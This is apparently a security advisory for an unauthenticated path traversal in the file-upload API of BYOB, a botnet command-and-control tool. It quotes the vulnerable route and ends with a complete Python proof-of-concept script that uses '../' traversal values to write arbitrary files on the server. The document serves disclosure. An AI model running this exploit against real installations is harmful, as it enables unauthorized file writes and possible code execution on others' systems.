The open-source command and control software BYOB suffers from a path traversal vulnerability. An unauthenticated attacker exploiting this vulnerability is able to write files to arbitrary locations.
The vulnerable code can be found in web-gui/buildyourownbotnet/api/files/routes.py
:
@files.route("/api/file/add", methods=["POST"])
def file_add():
"""Upload new exfilrated file."""
b64_data = request.form.get('data')
filetype = request.form.get('type')
owner = request.form.get('owner')
module = request.form.get('module')
session = request.form.get('session')
filename = request.form.get('filename')
# ...
output_path = os.path.join(os.getcwd(), 'buildyourownbotnet/output', owner, 'files', filename)
# ...
# save exfiltrated file to user directory
with open(output_path, 'wb') as fp:
fp.write(data)
return filename
Accessing this API doesn't require authentication and it allows an attacker to write arbitrary data to an arbitrary location as demonstrated by the following PoC:
#!/usr/bin/env python3
import requests
import base64
import argparse
def exploit(url, data, filename):
output = requests.post('{}/api/file/add'.format(url), data={'data': base64.b64encode(data), 'type': '', 'owner': '../api/', 'module': '', 'session': '', 'filename': '../../../' + filename}).text
return output == '../../../' + filename
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Arbitrary file write on BYOB')
parser.add_argument('url', help='base url of the BYOB installation (e.g. http://localhost/)')
parser.add_argument('data', help='data to write')
parser.add_argument('filename', help='file name relative to the web-gui directory')
args = parser.parse_args()
print(exploit(args.url, args.data, args.filename))